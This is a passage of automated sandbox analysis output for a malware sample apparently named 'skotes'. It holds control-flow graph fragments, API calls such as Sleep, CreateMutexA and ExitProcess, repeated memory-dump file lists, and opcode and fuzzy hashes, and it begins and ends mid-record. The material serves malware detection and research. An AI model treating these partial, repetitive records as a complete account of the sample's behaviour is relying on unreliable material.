RtlAllocateHeap 12575->12576 12575->12578 12577 f343eb 12576->12577

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 367 f6652b-f66538 call f6a302 370 f6655a-f6656c call f6656d ExitProcess 367->370 371 f6653a-f66548 GetPEB 367->371 371->370 373 f6654a-f66559 371->373 373->370
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00F6652A,?,?,?,?,?,00F67661), ref: 00F66567
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: 26d884b70fb9a0f797843b0364c9775382a38fdcb91109a9352ba31d4a78496f
                                                                                                                                                                                                                                                  • Instruction ID: 0c9197af0b41f6951e4ce5333439152fc7e5eaa8175f721d95b7cefc7ad0794b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26d884b70fb9a0f797843b0364c9775382a38fdcb91109a9352ba31d4a78496f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41E08C3001010CAFCE257B18DD0EA483B6AFB41751F540814F809C6232CB2AED91EA90

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 54904b904e27d11e1c0d89d376dd5abbc4f5045e8b170a26ce2d84d71d519639
                                                                                                                                                                                                                                                  • Instruction ID: 27f87a9bbd9aa20c962a288348b192fa3d12f090906bebff25421a6aced720eb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54904b904e27d11e1c0d89d376dd5abbc4f5045e8b170a26ce2d84d71d519639
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C312C31B092058BEB089B7CDC89B6DBB62EBC5334F244219E454EB3D5C7B58981AB51

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 22 f39f44-f39f64 26 f39f92-f39fae 22->26 27 f39f66-f39f72 22->27 28 f39fb0-f39fbc 26->28 29 f39fdc-f39ffb 26->29 30 f39f74-f39f82 27->30 31 f39f88-f39f8f call f4d663 27->31 33 f39fd2-f39fd9 call f4d663 28->33 34 f39fbe-f39fcc 28->34 35 f3a029-f3a916 call f480c0 29->35 36 f39ffd-f3a009 29->36 30->31 37 f3a92b 30->37 31->26 33->29 34->33 34->37 42 f3a00b-f3a019 36->42 43 f3a01f-f3a026 call f4d663 36->43 39 f3a953-f3a994 Sleep CreateMutexA 37->39 40 f3a92b call f66c6a 37->40 52 f3a9a7-f3a9a8 39->52 53 f3a996-f3a998 39->53 40->39 42->37 42->43 43->35 53->52 54 f3a99a-f3a9a5 53->54 54->52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 7e244d195859d7807808be800c8b44dc5903be904dcec91952fa11710767e026
                                                                                                                                                                                                                                                  • Instruction ID: eb4f30d7214707586a89ac5eedd1600249f274107aafb9d4d1ab19158bf4d162
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e244d195859d7807808be800c8b44dc5903be904dcec91952fa11710767e026
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02315B31B052048BEB189B7CDC88BADBB62EBC5334F244619E454EB3D5D7758980AB52

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 56 f3a079-f3a099 60 f3a0c7-f3a0e3 56->60 61 f3a09b-f3a0a7 56->61 64 f3a111-f3a130 60->64 65 f3a0e5-f3a0f1 60->65 62 f3a0a9-f3a0b7 61->62 63 f3a0bd-f3a0c4 call f4d663 61->63 62->63 66 f3a930-f3a994 call f66c6a Sleep CreateMutexA 62->66 63->60 70 f3a132-f3a13e 64->70 71 f3a15e-f3a916 call f480c0 64->71 68 f3a0f3-f3a101 65->68 69 f3a107-f3a10e call f4d663 65->69 86 f3a9a7-f3a9a8 66->86 87 f3a996-f3a998 66->87 68->66 68->69 69->64 76 f3a140-f3a14e 70->76 77 f3a154-f3a15b call f4d663 70->77 76->66 76->77 77->71 87->86 88 f3a99a-f3a9a5 87->88 88->86
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
